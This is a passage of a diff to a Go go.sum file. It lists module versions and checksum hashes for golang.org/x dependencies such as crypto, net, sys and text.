golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392/go.mod h1:/lpIB1dKB+9EgE3H3cr1v9wB50oz8l4C4h62xy7jSTY=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9 h1:psW17arqaxU48Z5kZ0CQnkZWQJsqcURM6tKiBApRjXI=
|
||||
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
|
||||
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
|
||||
golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
|
||||
golang.org/x/crypto v0.0.0-20211108221036-ceb1ce70b4fa/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
|
||||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa h1:zuSxTR4o9y82ebqCUJYNGJbGPo6sKVl54f/TVDObg1c=
|
||||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
|
||||
golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
|
||||
golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8=
|
||||
golang.org/x/exp v0.0.0-20190829153037-c13cbed26979/go.mod h1:86+5VVa7VpoJ4kLfm080zCjGlMRFzhUhsZKEZO7MGek=
|
||||
golang.org/x/exp v0.0.0-20191030013958-a1ab85dbe136/go.mod h1:JXzH8nQsPlswgeRAPE3MuO9GYsAcnJvJ4vnMwN/5qkY=
|
||||
golang.org/x/exp v0.0.0-20191129062945-2f5052295587/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
golang.org/x/exp v0.0.0-20191227195350-da58074b4299/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
golang.org/x/exp v0.0.0-20200119233911-0405dc783f0a/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4=
|
||||
golang.org/x/exp v0.0.0-20200207192155-f17229e696bd/go.mod h1:J/WKrq2StrnmMY6+EHIKF9dgMWnmCNThgcyBT1FY9mM=
|
||||
golang.org/x/exp v0.0.0-20200224162631-6cc2880d07d6/go.mod h1:3jZMyOhIsHpP37uCMkUooju7aAi5cS1Q23tOzKc+0MU=
|
||||
golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js=
|
||||
golang.org/x/image v0.0.0-20190802002840-cff245a6509b/go.mod h1:FeLwcggjj3mMvU+oOTbSwawSJRM1uh48EjtB4UJZlP0=
|
||||
golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
|
||||
golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU=
|
||||
golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
|
||||
golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190909230951-414d861bb4ac/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20191125180803-fdd1cda4f05f/go.mod h1:5qLYkcX4OjUUV8bRuDixDT3tpyyb+LUpUlRWLxfhWrs=
|
||||
golang.org/x/lint v0.0.0-20200130185559-910be7a94367/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/lint v0.0.0-20201208152925-83fdc39ff7b5/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
|
||||
golang.org/x/mobile v0.0.0-20190719004257-d2bd2a29d028/go.mod h1:E/iHnbuqvinMTCcRqshq8CkpyQDoeVncDDYHnLhea+o=
|
||||
golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc=
|
||||
golang.org/x/mod v0.1.0/go.mod h1:0QHyrYULN0/3qlju5TqG8bIK38QM8yzMo5ekMj3DlcY=
|
||||
golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
|
||||
golang.org/x/mod v0.1.1-0.20191107180719-034126e5016b/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
|
||||
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 h1:6zppjxzCulZykYSLyVDYbneBfbaBIQPYMevg0bEwv2s=
|
||||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
|
||||
golang.org/x/net v0.0.0-20180611182652-db08ff08e862/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
@ -314,24 +447,59 @@ golang.org/x/net v0.0.0-20190125091013-d26f9f9a57f3/go.mod h1:mL1N/T3taQHkDXs73r
|
||||
golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190501004415-9ce7a6920f09/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190503192946-f4e77d36d62c/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190522155817-f3200d17e092/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks=
|
||||
golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks=
|
||||
golang.org/x/net v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190923162816-aa69164e4478/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190930134127-c5a3c61f89f3 h1:6KET3Sqa7fkVfD63QnAM81ZeYg5n4HwApOJkufONnHA=
|
||||
golang.org/x/net v0.0.0-20190628185345-da137c7871d7/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190724013045-ca1201d0de80/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190930134127-c5a3c61f89f3/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200707034311-ab3426394381 h1:VXak5I6aEWmAXeQjA+QSZzlgNrpq9mjcfDemuexIKsU=
|
||||
golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200222125558-5a598a2470a0/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200506145744-7e3656a0809f/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200513185701-a91f0712d120/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200520182314-0ba52f642ac2/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.0.0-20201031054903-ff519b6c9102/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20201224014010-6772e930b67b/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
|
||||
golang.org/x/net v0.0.0-20210726213435-c6fcb2dbf985/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
|
||||
golang.org/x/net v0.0.0-20220630215102-69896b714898/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
|
||||
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462 h1:UreQrH7DbFXSi9ZFox6FNT3WBooWmdANpU+IfkT1T4I=
|
||||
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462/go.mod h1:YDH+HFinaLZZlnHAfSS6ZXJJ9M9t4Dl22yv3iI2vPwk=
|
||||
golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
|
||||
golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20191202225959-858c2ad4c8b6/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20200902213428-5d25da1a8d43/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20201109201403-9fd604954f58/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20201208152858-08078c50e5b5/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20210218202405-ba52d332ba99/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190423024810-112230192c58 h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=
|
||||
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20201207232520-09787c993a3a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4 h1:uVc8UZUe6tr40fFVnUP5Oj+veunVezqYl9z7DYw9xzw=
|
||||
golang.org/x/sys v0.0.0-20180622082034-63fc586f45fe/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
@ -341,59 +509,225 @@ golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5h
|
||||
golang.org/x/sys v0.0.0-20181122145206-62eef0e2fa9b/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190209173611-3b5209105503/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190403152447-81d4e9dc473e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190507160741-ecd444e8653b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190606165138-5da285871e9c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190726091711-fc99dfbffb4e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190801041406-cbf593c0f2f3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190922100055-0a153f010e69/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe h1:6fAMxZRR6sl1Uq8U61gxU+kPTs2tR8uOySCbBP7BN/M=
|
||||
golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd h1:xhmwyvizuTgC2qz7ZlMluP20uW+C3Rm0FD/WLDX8884=
|
||||
golang.org/x/sys v0.0.0-20191001151750-bb3f8db39f24/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/text v0.3.0 h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=
|
||||
golang.org/x/sys v0.0.0-20200331124033-c3d80250170d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200501052902-10377860bb8e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200511232937-7e40ca221e25/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200515095857-1151b9dac4a9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200523222454-059865788121/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200803210538-64077c9b5642/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200905004654-be1d3432aa8f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20201201145000-ef89a241ccb3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210104204734-6f8348627aad/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210225134936-a50acf3fe073/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220731174439-a90be440212d h1:Sv5ogFZatcgIMMtBSTTAgMYsicp25MXBubjXNDKwm80=
|
||||
golang.org/x/sys v0.0.0-20220731174439-a90be440212d/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
|
||||
golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=
|
||||
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
|
||||
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk=
|
||||
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
|
||||
